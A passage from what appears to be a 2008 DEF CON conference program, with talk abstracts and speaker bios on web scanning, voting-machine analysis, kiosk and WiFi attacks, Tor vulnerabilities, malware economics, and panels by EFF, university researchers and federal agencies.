Before moving to India, Jonathan worked as a security researcher in the Defense area in France for Sagem Defense Securite, where he designed and patented new protection schemes for protecting applications against reverse engineering under GNU/Linux architectures. Prior to that position, he also worked at Edelweb, a pioneering French pentesting consulting company. He therefore has experience with both ends of the security industry...

During college, Jonathan was employed as a network administrator of one of the major school networks in France, which gave him a strong taste for networking and network security.

Jonathan started getting interested in low level security issues more than 10 years ago, when he learnt x86 asm under MS-DOS. Many things have changed since those good old times of real mode OSes, but there is still room for surprises... Low level attacks involving deep knowledge of computer internals are not dead... just read the paper ;) Jonathan would also like to mention his ties to excellent security research groups such as pulltheplug.org and blacksecurity.org: this is where public information ends and where security research begins...


Grendel-Scan: A new web application scanning tool


David Byrne
Security Consultant, Trustwave
Eric Duprey
Senior Security Engineer, Dish Network

While commercial web application scanners have been available for quite a while, the selection of open source tools has been limited. Grendel-Scan is a new tool that aims to provide in-depth application assessment. Written entirely in Java and featuring an easy to use GUI, the tool is intended to be useful to a wide variety of technical backgrounds: from IT security managers, to experienced penetration testers.

Grendel-Scan can test for authentication and authorization bypass, SQL injection (blind and error-based), XSS, CRLF injection / response splitting, session key strength, session fixation, file/directory/backup enumeration, directory indexing, web server mis-configuration, and other vulnerabilities. Exploration of the web application can be accomplished through an embedded proxy server, via automated spidering, or search engine reconnaissance.

The accuracy of the testing is increased by powerful features such as automatic detection and correction of logged out sessions, heuristic file-not-found detection, and an embedded HTML DOM parser and JavaScript engine for full page analysis. Grendel-Scan was architected with extensibility in mind. Powerful libraries offering features such as input/output tracing, session tracking, or HTML DOM comparisons make the development of new test modules much easier.

The presentation will feature an overview of the application's design, results of comparative analysis against similar tools, and a live demonstration of the tool using a real application (not an intentionally vulnerable app).

David Byrne is a penetration tester in Trustwave's SpiderLabs division. David was also the founder of the Denver chapter of the Open Web Application Security Project (OWASP).

Eric Duprey is a Senior Security Engineer with Dish Network and leader of the Denver chapter of OWASP.


Building a Real Session Layer


D.J. Capelis

It's past time for a session layer. It's time to replace port knocking with a real authentication framework. It's time to do what DNS did with IP addresses to port numbers. It's time to run services over NATs, eliminate the need for vhosts in your webserver and provide optional transparent encryption for any client who wants it. In this talk, we'll do that and a couple other tricks... within the framework of a little-known RFC that was written almost 2 decades ago.

D.J. Capelis spends his time at University of California, San Diego eating pizza. A portion of the remaining time is dedicated to research on building more secure computer systems. His latest research areas include building trusted platforms that aren't evil, looking for the next hot thing among old ideas and raining on the parades of people who think virtualization is a wonderful idea for production systems. He yearns for a time when XML was a scary dream, SPRITE would transparently migrate your processes between machines and real programmers had an inexplicable hatred for quiche.


Hacking E.S.P.


Joe Cicero
Network Specialist Instructor, Northeast Wisconsin Technical College
Michael Vieau
Independent security researcher

Have you gone to school? Are you going to school? Do you work at a school? How do you prove you went to a particular high school, college or university? FACT: Educational institutions MUST keep your personal/confidential information. Therefore, your personal/confidential information might be at risk! This presentation will be about typical software packages found at educational institutions and their vulnerabilities. We will use known attacks to show new vulnerabilities in several typical educational software packages. The presentation will focus on the vulnerabilities, what tools were used to find them, and why successfully exploiting a weak system will allow you to gain access to a secure system.

Joe Cicero is currently a Network Specialist Instructor for Northeast Wisconsin Technical College, where he specializes in teaching Linux, Network Security, and Computer Forensics courses. He is originally from Green Bay and in 1985 he joined the Marines. His final duty assignment was as the Operations Chief for Tactical Warfare Simulations Evaluations Analyses Systems (TWSEAS), where he traveled the world conducting training through the use of computer simulations.

Michael Vieau is an independent security researcher located in United States where he conducts security assessments & penetration tests on new and existing technology for various customers (and sometimes just for fun). His main focus is on *NIX security, mobile devices, and wireless security. He comes from a wide technical background ranging from network infrastructure, to programming, instructing, & of course security.


Hacking Desire


Ian Clarke
CEO, Uprizer Labs LLC & Coordinator, The Freenet Project

What do you want? This is the question that almost every commercial organization on the planet thinks they have an answer to, but do they? Figuring out what people want is essentially a process of reverse engineering human needs, desire, and preference. It turns out that hackers are particularly adept at reverse engineering, so what happened when we applied our skills to reverse engineering what you, and everyone else, wants?

This talk will describe how we constructed a model for how the human mind decides what it wants, and then customized this model to imitate particular individuals, and thus anticipate specifically what they want. I will demonstrate the effectiveness of this approach on guessing how much particular users will like particular movies, based on the feedback they've given to a popular movie rental website. I'll also discuss flaws in how "collaborative filters" are designed and measured, and explain why our approach is an improvement.

This talk will discuss sophisticated ideas in machine learning and artificial intelligence, but no background in these topics will be required for attendees.

Ian Clarke is a Computer Scientist and Entrepreneur, with a track record of both technical and business innovation, and an outspoken thinker and activist on issues relating to freedom of speech, intellectual property law, and technology. Ian is the founder and coordinator of the Freenet Project; designed to allow true freedom of communication, Freenet was the first decentralized anonymous peer-to-peer network, and a precursor of the "distributed hashtable" data structure. Ian has also founded a number of innovative and diverse commercial ventures, including Revver, the first online video website to share revenue with video creators, and Thoof, a collaboratively generated personalized news website. Ian has a degree in Artificial Intelligence and Computer Science from Edinburgh University, Scotland.


Climbing Everest: An Insider's Look at one state's Voting Systems


Sandy Clark "Mouse"
University of Pennsylvania

Hanging Chads, Hopping votes, Flipped votes, Tripled votes, Missing memory cards, Machine malfunctions, Software glitches, Undervotes, Overvotes. Reports of voting machine failures flooded the news after the last elections and left most voters wondering "Does my vote really count?" "Can these electronic voting machines be trusted?" "How secure are my state's voting systems?"

In December 2007, we published an in depth, source code and hardware analysis of all the voting systems used by the state of Ohio, funded by the Ohio Secretary of State. Come find out what we learned, and draw your own conclusions.

Sandy Clark, "Mouse" has been taking things apart since the age of two, and still hasn't learned to put them back together. Luckily, in the University of Pennsylvania's Distributed Systems Lab, this behavior is actively encouraged. A founding member of Toool-USA, she also enjoys puzzles, toys, Mao (the card game, not the person) and infrastructure hacking. Her research explores human scale security and the unexpected ways that systems interact.


Could Googling Take Down a President, a Prime Minister, or an Average Citizen?


Greg Conti
United States Military Academy

Every time we use the web, we disclose tremendous amounts of information to ISPs, Internet backbone providers, and online companies; information that will be shared and data mined, but rarely discarded. Email addresses, phone numbers, aggregated search queries, cookies, IP addresses - any unique feature of our behavior provides a mechanism to link, profile, and identify users, groups, and companies. From these revelations all aspects of our daily lives emerge, including our activities, locations, and social networks. Making matters worse, ubiquitous advertising networks, dominant online companies, complicit network providers, and popular web analytic services possess the ability to track, and in some cases, eavesdrop on and modify our online communications.

The AOL dataset debacle and subsequent public outrage illustrated one facet of the problem - Search. This talk covers all aspects of the problem, including end user computers, network providers, online companies, and advertising networks. It also includes countermeasures to help protect your personal and organizational privacy. It is important to note that the research presented is the inverse of Google Hacking, which strives to retrieve sensitive information from the databases of search engines. This talk instead focuses on what information online companies can pull from you, as well as what network providers can see and modify. The long-term implications of web-based information disclosure are profound. Interaction by interaction we are ceding power to ISPs and online companies, disclosures which may one day alter the course of elections, remove world leaders from power, or cause the outspoken citizen to disappear from the web.

Greg Conti is an Assistant Professor of Computer Science at the United States Military Academy, West Point, NY. His research includes security data visualization and web-based information disclosure. He is the author of Security Data Visualization (No Starch Press) and the forthcoming Googling Security (Addison-Wesley). His work can be found at www.gregconti.com and www.rumint.org.


Compromising Windows Based Internet Kiosks


Paul Craig
Principal Security Consultant, Security-Assessment.com

Internet Kiosks have become common place in today's Internet centric society. Public Internet Kiosks can be found everywhere, from Airports, Train stations, Libraries and Hotels to corporate lobbies and street corners. Kiosks are used by thousands of users daily from all different walks of life, creed, and social status.

Internet kiosk terminals often implement custom browser software which relies on proprietary security mechanisms and access controls. Kiosks are designed to limit the level of access a user has to the Internet kiosk, and attempt to thwart malicious activity. Kiosk users are prohibited from accessing the Kiosk's local file system, or the surrounding local network attached to the Kiosk. The only guaranteed functionality is a "secured" web browser. For a service so common-place, there has been practically zero research regarding the security of Internet Kiosk software. This talk will cover Internet Kiosk software exploitation techniques, and demonstrate multiple methods of compromising Windows based Internet Kiosk terminals.

Paul Craig is a principal security consultant at Security-Assessment.com based in Auckland, New Zealand. Paul is a kiwi hacker with a passion for breaking technology whenever possible. It's highly suggested to buy Paul a beer whenever possible.


Shifting the Focus of WiFi Security: Beyond cracking your neighbor's wep key


Thomas d'Otreppe de Bouvette "Mister_X"

Rick Farina "Zero_Chaos"

In this talk we will discuss the paradigm shift of WiFi attacks away from the Access Points and focusing toward the clients. We will cover in depth how simple tricks such as HoneyPot Access Points or even hotspotter simply are not enough anymore and more flexible and powerful methods are being developed and used. The older, dated technologies built into Access Points for ensuring network security have failed the test of time paving way for new overlay security vendors to begin selling "Wireless Intrusion Detection and Prevention Systems" to fill the gap left by the Access Point manufacturers and the ieee802.11 committee.

We will explore a variety of features of these devices, and see which claims stack up and which ones do not. Finally, we will explore a new frontier for WiFi networks: licensed frequencies. Many vendors currently ship ieee 802.11 compliant devices that operate on non-public bands. We will explore what types of things you can find with some simple driver modifications and why the current generation of tools needs to improve to play by these new rules. If you want to learn about what wireless hacking will look like in the coming year, instead of just cracking wep, you can't afford to miss this talk.

Thomas d'Otreppe is the creator of Aircrack-ng and also designed the WiFu course (Offensive-security) with Mati Aharoni.

Rick Farina is a member of the aircrack-ng team and has been working with wireless security for 8 years. In the past Rick has been involved in low-level network hacking such as ettercap and generally enjoys hanging out at layer 2.


Hacking Data Retention: Small Sister, your digital privacy self defense


Brenno De Winter
J.S.A.A.F., De Winter Information Solutions

Over the last couple of years a range of privacy threats have been occurring. Europe is starting to look like the playing field of what is to come to the US: storage of all e-mail traffic, online presence, phone calls, actual traveling throughout nations and filtering of content. Fortunately a closer look at the measures shows that it is never smart to overestimate the abilities European governments have, and digital self defense is possible. But we don't want to underestimate the threat either, so we look at how the effects of these measures can be greatly reduced and how we can have fun online again. This knowledge is something we probably want to extend to many people to help them reclaim their digital rights with the use of simple and existing technologies. The Small Sister Project shows you how to do that and delivers the tools to make that easier. Learn how simple measures can make a huge difference.

Brenno De Winter started experimenting with security at the age of 9. He has a background in open source that dates back to 1993 and he contributed to several projects like MySQL, GnuPG, Gnucomo (Gnu Computer Monitoring) and recently started the Small Sister project for privacy-friendly internet usage. In his daily job he practices security, teaches it and works as an IT journalist. His writings have triggered several debates in parliament and often raise questions.


Security and anonymity vulnerabilities in Tor: past, present, and future


Roger Dingledine
Project leader, The Tor Project

There have been a number of exciting bugs and design flaws in Tor over the years, with effects ranging from complete anonymity compromise to remote code execution. Some of them are our fault, and some are the fault of components (libraries, browsers, operating systems) that we trusted. Further, the academic research community has been coming up with increasingly esoteric --- and increasingly effective! --- attacks against all anonymity designs, including Tor.

Roger will walk through some of the most egregious bugs and design flaws we've had, and give some intuition about lessons learned building and deploying the largest distributed anonymity network ever. Then he'll outline the wide variety of current vulnerabilities we have, explain what they mean for our users, and talk about which ones we have a plan for and which ones will continue to be a pain for the coming years. Last, we'll speculate about categories and topics that are likely to introduce new problems in the future.

Roger Dingledine is project leader for The Tor Project. The Tor network has grown to over 1500 relays handling traffic for hundreds of thousands of users daily. In the past few years The Tor Project has also gotten an increasingly diverse set of funders, become an official 501c3 nonprofit, and expanded its community of both volunteer and funded developers.

In addition to all the hats he wears for Tor, Roger organizes academic conferences on anonymity and security, speaks at industry and hacker cons, and does tutorials on anonymity for national and foreign law enforcement.


Next Generation Collaborative Reversing with Ida Pro and CollabREate


Chris Eagle
Associate Chairman of the Computer Science Dept, Naval Postgraduate School (NPS)
Tim Vidas
Research Associate, Naval Postgraduate School (NPS)
A major drawback with the use of most reverse engineering tools is that they were not designed with collaboration in mind. Numerous kludgy solutions exist, from asynchronous use of the same data files to working on multiple copies of data files which quickly diverge, leaving the differences to somehow be reconciled. Pedram Amini's Ida Sync provided a first step towards automated collaboration among Ida users; however, Ida Sync suffers from several shortcomings, including the fact that it has failed to keep pace with the evolution of Ida's internal architecture. In this presentation, the authors present a new tool titled collabREate, designed to bring nearly effortless collaboration to Ida users. The talk will include discussion of the IDA API and the ways in which it facilitates collaboration, along with the ways in which it hinders collaboration. The design of a robust server component, responsible for managing projects and connected clients, will also be discussed, along with a number of capabilities beyond simple collaboration that are enabled via the collabREate architecture.

Chris Eagle is the Associate Chairman of the Computer Science Department at the Naval Postgraduate School (NPS) in Monterey, CA. A computer engineer/scientist for 23+ years, his research interests include computer network operations, computer forensics and reverse/anti-reverse engineering. He has been a speaker at conferences such as Black Hat, Toorcon, CodeCon, and Shmoocon and is the author of the upcoming "The IDA Pro Book". In his spare time he heads up the Sk3wl of r00t CTF team and can be found pulling all-nighters at Defcon.

Tim Vidas is a Research Associate in the Computer Science Department at the Naval Postgraduate School (NPS). His current primary research focuses on high assurance trusted computing, but his interests also stray to digital forensics, reverse engineering, and the like. He maintains several academic affiliations and has previously spoken at conferences such as Shmoocon, CanSecWest, DC3 and HTCIA. In his free time he toys around with digital forensics competitions, CTF exercises, and any other interesting-looking challenges.


Markets for Malware: A Structural Economic Approach


Brian K. Edwards
Economist, Los Alamos National Laboratory
Silvio J. Flaim
Economist, Los Alamos National Laboratory

Much literature has addressed the issue of the relative sizes of shadow economies in different countries. What is largely missing from this discussion is a more structured discussion of how to incorporate estimates of shadow economic activity into the national income accounting framework, and a discussion of how the shadow components of specific industries can be analyzed in either an input-output or macroeconomic framework. After a brief discussion of existing estimates of black market activity, we discuss how black market activities might be measured and incorporated in standard economic models of the economy. We then focus particular attention on the malware industry and discuss how malware activity influences other economic activity (both official and shadow), discuss possible methods of how malware activity can be estimated, and how the contribution of malware to overall economic activity can be measured. Finally, we discuss how the methods used to integrate malware economic activity into the national income accounts can be applied to other sectors of the economy, and hence how to develop an alternative measure of the size of the shadow economy. With a new baseline incorporating these "shadow" activities, the economic model is used to examine questions such as: What is the net economic contribution of malware and other shadow economic activity? What would be the economic impact of eliminating malware and other shadow activity in all its forms?

Brian K. Edwards received his Ph.D. in economics from the University of California, San Diego, in 1984 and has over twenty years of experience in economic modeling, econometrics, macroeconomic and regional economic modeling, forecasting, and in energy, environmental, and natural resource economics. He has published numerous reports and academic publications, and recently authored a book, The Economics of Hydroelectric Power (2003). He is currently the Team Lead of the Socio-Economics Network Team of the Decision Analysis Division of Los Alamos National Laboratory. He has also held economist positions at the National Marine Fisheries Service, U.S. Government Accountability Office, Argonne National Laboratory, LECG, and RCF Economic and Financial Consulting. He also has a private consulting practice, Brian K. Edwards Associates.


Panel: All Your Sploits (and Servers) Are Belong To Us: Vulnerabilities Don't Matter (And Neither Does Your Security)


David Mortman
CSO in Residence, Echelon One
Rich Mogull
Securosis
Chris Hoff
Unisys
Robert "RSnake" Hansen
CTO, SecTheory
Robert Graham
CTO, Errata Security
David Maynor
CTO, Errata Security

Think that latest buffer overflow or XSS exploit matters? It doesn't. Think your network is secure because you have the latest and greatest IPS? It isn't. The truth is all exploits or defenses on their own are worthless; it's how you use your tools and respond to incidents that really matters. This panel, composed of top vulnerability and security researchers, will roll through a rapid-fire series of demonstrations as they smash through the security of popular consumer and enterprise devices and systems, often using simple techniques rather than the latest 0day exploits (but we'll see a few of those too). They'll then debate the value of any single attack vector or defense, and show how it's the practical application of attacks, defenses, and (more importantly) responses that really matters. From iPhones to browsers to SCADA, it isn't your advanced attack or defensive tool that matters, it's what you do with it.

As CSO-in-Residence, David Mortman is responsible for Echelon One's research and analysis program. Formerly the Chief Information Security Officer for Siebel Systems, Inc., David and his team were responsible for Siebel's worldwide IT security infrastructure, both internal and external. He also worked closely with Siebel's product groups and the company's physical security team and led Siebel's product security and privacy efforts. Previously, Mr. Mortman was Manager of IT Security at Network Associates, where, in addition to managing data security, he deployed and tested all of NAI's security products before they were released to customers. Before that, Mortman was a Security Engineer for Swiss Bank. A CISSP, member of USENIX/SAGE and ISSA, and an invited speaker at the RSA 2002 and 2005 security conferences, Mr. Mortman has also been a panelist and speaker at RSA 2007, InfoSecurity 2003, Blackhat 2004, 2005, 2006 and 2007, Defcon 2005, 2006 and 2007 and Information Security Decisions 2007 as well. Mr. Mortman sits on a variety of advisory boards including Qualys, Applied Identity and Reflective amongst others. He holds a BS in Chemistry from the University of Chicago.

Robert "RSnake" Hansen (CISSP) is the Chief Executive Officer of SecTheory. SecTheory is a web application and network security consulting firm. Robert has been working with web application security since the mid 90's, beginning his career in banner click fraud detection at ValueClick. Robert has worked for Cable & Wireless heading up managed security services, and at eBay as Sr. Global Product Manager of Trust and Safety, focusing on anti-phishing, anti-cross-site scripting, and anti virus strategies. Robert also sits on the technical advisory board of ClickForensics and contributes to the security strategy of several startup companies. Robert is best known for founding the web application security lab at ha.ckers.org and co-authoring XSS Exploits and Defense. Robert is a member of WASC, IACSP, and ISSA, and contributed to the OWASP 2.0 guide.

Robert Graham is the co-founder and CTO of Errata Security, a firm specializing in cybersecurity consulting and product verification. Mr. Graham learned hacking as a toddler from his grandfather, a WWII codebreaker. His first IDS, written more than 10 years ago, was designed to catch Morris-worm copycats. He is the author of several pending patents in the IDS field, the author of well-regarded security-related documents, and a frequent speaker at conferences. Previously he was the chief scientist of Internet Security Systems. Before that he was the co-founder, CTO, and chief architect of Network ICE, which was acquired by Internet Security Systems.

David Maynor is a founder of Errata Security and serves as its Chief Technical Officer. Mr. Maynor is responsible for the day-to-day technical decisions of Errata Security and also draws on a strong background in reverse engineering and exploit development to produce Hacker Eye View reports. Mr. Maynor was previously the Senior Researcher for Secureworks and a research engineer with the ISS X-Force R&D team, where his primary responsibilities included reverse engineering high-risk applications, researching new evasion techniques for security tools, and researching new threats before they became widespread. Before ISS, Maynor spent three years at the Georgia Institute of Technology (GaTech), the last two as part of the information security group, working as an application developer to help make the sheer size and magnitude of security incidents on campus manageable.

Top of page

Panel: Black vs. White: The complete life cycle of a real world breach


David Kennedy
Practice Lead: Profiling & e.Discovery, SecureState
Ken Stasiak
President & CEO, SecureState
Scott White
Senior Security Consultant, SecureState
John Melvin
Senior Security Consultant, SecureState
Andrew Weidenhamer
Staff Security Consultant, SecureState

Black vs. White: The complete life cycle of a real world breach combines a unique idea with a real-world case study from a client of ours, following a hack from its start through identification, forensics, and reversing. We will be discussing some advanced penetration techniques and reversing topics. Starting off, we will perform a full system compromise from the Internet (complete with live demos) and install some undetectable viruses, then have a separate team reverse them and show you what they are doing and how they work. This is the ultimate battle of evil versus good.

Additionally, what would a con be without some awesome tool releases? We will be releasing (and demoing) two tools: a Windows GUI for the Windows folks that does everything for SQL injection rooting, minus making you breakfast, and a Linux-based tool that auto-crawls a site and performs blind/error-based SQL injection with reverse command shells, using various options for payload delivery.

David Kennedy, CISSP, GSEC, MCSE 2003, is the practice lead for the profiling and e.Discovery group at SecureState, a Cleveland, Ohio based security consulting company. David has been in the security field for over eight years. David has released tools in the past, including the popular Python-based tool Fast-Track, included in Back|Track 3, and is also a contributor to the Back|Track suite. David runs a team of highly skilled security individuals that perform penetration tests on mid-sized to large businesses; the team's clients include top-ten banks, Fortune 500/1000 companies, and multi-billion-dollar organizations. Prior to SecureState, David worked for the National Security Agency (NSA) in a specialized security group as an active-duty Marine. David has developed several security-related systems for the DoD that are still in use today. David has presented at several speaking engagements, including the international INFOSEC summit, the international HTCIA, and various other large-scale forums.

Ken Stasiak, CISSP, CISA, GSEC, CISM, QSA, is the president and CEO of SecureState and has been involved in security for over fourteen years. Ken originally began his security career at Ernst & Young, where he had the privilege of working with extremely talented people, including Jeff Moss and the original founders of Foundstone. After E&Y, he moved to Arthur Andersen, where he headed up an entire regional security group for the organization. Ken started SecureState a week after September 11th, 2001, to create an elite, dedicated security company known throughout the world.

Scott White is SecureState's lead web application security penetration tester. Scott is heavily involved with OWASP, running the Cleveland, Ohio OWASP chapter. He has been instrumental in securing web applications for companies all over the country.

Andrew Weidenhamer is SecureState's lead penetration tester and has been involved in security tool development in the community as well as in performing large-scale penetration efforts on numerous organizations. Andrew first started his security career at Key Bank, handling bank-level security. Desiring a more robust and fast-paced environment, Andrew joined SecureState and quickly became its lead penetration tester.

John Melvin, CISSP, GSEC, is SecureState's lead forensics investigator and handles all incident response, reverse engineering, and virus development at SecureState. John's mission is to respond to and handle breaches at organizations and to identify how, when, and why they occurred. Prior to SecureState, John worked on several highly classified programs, specifically pertaining to reverse malware/virus anomaly detection.

Top of page

Panel: Ask EFF: The Year in Digital Civil Liberties Panel


Kevin Bankston
Senior Staff Attorney, EFF
Eva Galperin
Referral Coordinator, EFF
Jennifer Granick
Civil Liberties Director, EFF
Marcia Hofmann
Staff Attorney, EFF
Corynne McSherry
Staff Attorney, EFF
Kurt Opsahl
Senior Staff Attorney, EFF

Get the latest information about how the law is racing to catch up with technological change from staffers at the Electronic Frontier Foundation, the nation's premier digital civil liberties group fighting for freedom and privacy in the computer age. This session will include updates on current EFF issues such as NSA wiretapping and fighting efforts to use intellectual property claims to shut down free speech and halt innovation, highlighting our open government efforts with documents obtained through the Freedom of Information Act on government surveillance efforts, introducing the Coders' Rights Project, and much more. Half the session will be given over to question-and-answer, so it's your chance to ask EFF questions about the law and technology issues that are important to you.

Kevin Bankston, an EFF Senior Staff Attorney specializing in free speech and privacy law, was EFF's Equal Justice Works/Bruce J. Ennis Fellow for 2003-05. His fellowship project focused on the impact of post-9/11 anti-terrorism laws and surveillance initiatives on online privacy and free expression. Before joining EFF, Kevin was the Justice William J. Brennan First Amendment Fellow for the American Civil Liberties Union in New York City. At the ACLU, Kevin litigated Internet-related free speech cases, including First Amendment challenges to both the Digital Millennium Copyright Act (Edelman v. N2H2, Inc.) and a federal statute regulating Internet speech in public libraries (American Library Association v. U.S.). Kevin received his J.D. in 2001 from the University of Southern California Law Center, and received his undergraduate degree from the University of Texas at Austin.

Eva Galperin is EFF's referral coordinator, and as such is usually the first person to encounter a request for legal assistance when it is brought to EFF. A lifelong geek, Eva misspent her youth working as a Systems Administrator all over Silicon Valley. Since then, she has seen the error of her ways and earned degrees in Political Science and International Relations from SFSU. She comes to EFF from the US-China Policy Institute, where she researched Chinese energy policy, helped to organize conferences, and attempted to make use of her rudimentary Mandarin skills. Her interests include aerials, rock climbing, opera, and not being paged at 3 o'clock in the morning because the mail server is down. This is her first DEFCON since 2001.

Jennifer Granick is the Civil Liberties Director at the Electronic Frontier Foundation. Before EFF, Granick was a Lecturer in Law and Executive Director of the Center for Internet and Society at Stanford Law School where she taught Cyberlaw and Computer Crime Law. She practices in the full spectrum of Internet law issues including computer crime and security, national security, constitutional rights, and electronic surveillance, areas in which her expertise is recognized nationally. Before teaching at Stanford, Jennifer spent almost a decade practicing criminal defense law in California. She was selected by Information Security magazine in 2003 as one of 20 "Women of Vision" in the computer security field. She earned her law degree from University of California, Hastings College of the Law and her undergraduate degree from the New College of the University of South Florida.

Marcia Hofmann is an EFF Staff Attorney focusing on government transparency and civil liberties issues. Along with her colleague David Sobel, she established EFF's FOIA Litigation for Accountable Government (FLAG) Project. Prior to joining EFF, Marcia was Director of the Open Government Project at the Electronic Privacy Information Center (EPIC), where she spearheaded EPIC's efforts to learn about emerging policies in the post-9/11 era and was lead counsel in several Freedom of Information Act (FOIA) lawsuits. Documents made public through her work have been reported on by the New York Times, Washington Post, National Public Radio, Fox News, and CNN, among others. She is a graduate of the University of Dayton School of Law and Mount Holyoke College.

Corynne McSherry is a Staff Attorney at EFF, specializing in intellectual property and free speech litigation. Representative cases include: Lenz v. Universal (copyright misuse), MoveOn.org et al. v. Viacom International (copyright misuse), Ricciuti et al. v. Sony BMG (class action based on a music label's use of DRM that introduced security flaws into users' computers), as well as numerous amicus briefs on trademark, copyright and patent issues. Prior to joining EFF, Corynne was a civil litigator at the law firm of Bingham McCutchen, LLP. Corynne holds a Ph.D. from the University of California at San Diego and a J.D. from Stanford Law School. While in law school, Corynne published Who Owns Academic Work?: Battling for Control of Intellectual Property (Harvard University Press, 2001).

Kurt Opsahl is a Senior Staff Attorney with the Electronic Frontier Foundation focusing on civil liberties, free speech and privacy law. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arriba Soft, MGM v. Grokster and CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall and his undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Court appeal, which established the reporter's privilege for online journalists.

Top of page

Panel: Hacking in the Name of Science


Tadayoshi Kohno
Assistant Professor, University of Washington
Jon Callas
Chief Technology Officer, PGP Corporation
Alexei Czeskis
PhD Student, University of Washington
Dan Halperin
PhD Student, University of Washington
Karl Koscher
PhD Student, University of Washington
Michael Piatek
PhD Student, University of Washington

Our talk will start with some of our latest and greatest hacks. In 2003 we were the first to analyze the security of Diebold's AccuVote-TS voting machine software. We'll discuss the inside scoop on how we got the code, broke it, and then went public. In 2008 we also published the first attacks against a real, common wireless implantable medical device – an implantable defibrillator and pacemaker – and we did so using off-the-shelf software radios. What else will we talk about? Well, there was our research in measuring just how frequently ISPs are injecting ads into people's web pages, our framing of network printers for copyright infringement (and receiving DMCA takedown notices to those printers), our invention of clock skew-based remote physical device fingerprinting, and much more.

Are we hackers? No, we're scientists at a leading public university. So what turns hacking into "science" when it's done by academics? We'll answer these and other questions in the second half of the talk, which is geared to give you an inside glimpse into the world of academic security research. Along the way we'll answer questions like: How do we choose which technologies to hack – or as we say – "analyze," "study," and "investigate?" What might we hack next? What can we do as academic researchers in public institutions that industry researchers can't? What ethical and legal issues do we need to consider? And why is what we do considered "science?"

Anyone who doesn't want their product to be the next technology hacked (sorry, "studied") by academics like us should definitely attend this talk. And, of course, come to this talk if you're considering grad school in computer security. We'll also debate how academics and industry security researchers could better work together. Here we'd particularly like your feedback. What can academics learn from you? What do you think we could do better? What would you like us to look at next?

(Standard academic disclaimer: Many of the works we will discuss were previously published in conjunction with other researchers. We'll acknowledge all relevant parties in the talk.)

Tadayoshi (Yoshi) Kohno is an Assistant Professor of Computer Science and Engineering at the University of Washington. He worked as a cryptography and computer security consultant with Bruce Schneier, back when Counterpane Systems had less than a handful of full-time cryptographers and before the days of Counterpane Internet Security, Inc. Since then he's conducted published security analyses of technologies as varied as electronic voting machines, implantable wireless defibrillators, file encryption systems, popular consumer devices, and ISP ad injectors. Kohno has a Ph.D. in Computer Science (cryptography) from the University of California at San Diego.

Jon Callas served as Chief Scientist at PGP Inc. and as CTO of the Network Security Division for Network Associates Technologies Inc. Mr. Callas served as Director of Software Engineering at Counterpane Internet Security Inc. and was a co-architect of Counterpane's Managed Security Monitoring system. Most recently, he was Senior Systems Architect at Wave Systems Corporation. His career includes work at Digital Equipment Corporation, World Benders, and Apple Computer. He is the principal author of the Internet Engineering Task Force's (IETF's) OpenPGP standard and a writer and frequent lecturer on system security and intellectual property issues. Mr. Callas has a B.S. in Mathematics from the University of Maryland.

Alexei Czeskis is a graduate student in the Computer Science and Engineering department of the University of Washington, where he hacks (or, more benignly, performs research) under Professor Yoshi Kohno. Formerly, he was a part of CERIAS, the Center for Education and Research in Information Assurance and Security at Purdue University. Alexei has also spent time in industry working with Amazon.com's transaction risk management group.

Dan Halperin is a PhD student in computer science and engineering at the University of Washington. His research includes wireless networking, with a current focus on next-generation technologies, and practical security and privacy in the wired and wireless, digital and physical domains. He received his BS in computer science and mathematics from Harvey Mudd College and his MS at Washington. He likes to make and break things in his spare time, and on the side helps teach lock picking to Washington undergraduates and is an avid participant in urban spelunking. In addition to memberships in dry academic communities, Daniel is a member of the EFF.

Karl Koscher is a computer science PhD student at the University of Washington. While interested in a wide variety of security topics, the bulk of his work has focused on the privacy and security issues surrounding RFID and other ubiquitous technologies. He is informally known around the department as "big brother."

Michael Piatek is a PhD student at the University of Washington. After spending his undergraduate years working on differential geometry, his research interests now include incentive design in distributed systems, network measurement, and large-scale systems building.

Top of page

Panel: Internet Wars 2008


Gadi Evron
Moderator

Some of the panel members in previous years:

Andrew Fried IRS
Thomas Grasso FBI
Dan Hubbard Websense
Dan Kaminsky IOActive
Randy Vaughn Baylor
Paul Vixie ISC

This year's panel members will be announced closer to the conference date.

Continuing our new tradition from the past two years, leading experts from different industries, academia and law enforcement will go on stage and participate in this panel, discussing the current threats on and to the Internet, from regular cyber-crime all the way to the mafia, and even some information warfare.

In this panel session we will begin with a short (2-5 minute) introductory presentation from Gadi Evron on the latest technologies and operations of the Bad Guys and the Good Guys: what's going on with Internet operations, global routing, botnets, extortion, phishing, and the annual revenue the mafia is getting from it. The members will accept questions on any subject related to the topic at hand, and discuss openly what's being done and what we can expect in the future, both from the Bad Guys and the Good Guys.

Discussion is to be limited to issues happening on the Internet, rather than this or that vulnerability. The discussion is mostly technological and operational in nature, although for example two years ago attendees chose to ask questions directing the discussion to the legal side of things. Participants are people who are involved with battling cyber-crime daily, and are some of the leaders in the security operations community of the Internet.

Gadi Evron is recognized globally for his work and leadership in Internet security operations. He is the founder of the Zeroday Emergency Response Team (ZERT), organizes and chairs worldwide conferences, working groups and task forces. He is considered an expert on corporate security and counterespionage, botnets, e-fraud and phishing. Previously, Gadi was CISO at the Israeli government ISP (eGovernment project) and founded the Israeli Government CERT. Gadi authored two books on information security and is a frequent lecturer.

Top of page

Panel: Meet the Feds 2008


Jim Christy
DC3
Mike Convertino
AFCC
Cynthia Cuddihy
RCMP
James Finch
FBI
Barry Grundy
NASA
David Helfen
NCIS
Bob Hopper
NW3C
Ray Kessenich
DCITA
Tim Kosiba
NSA
Mischel Kwon
USCERT
Rich Marshall
NSA
Marc Moreau
RCMP
Tom Pownall
RCMP
Ken Privette
USPS IG
Lin Wells
NDU

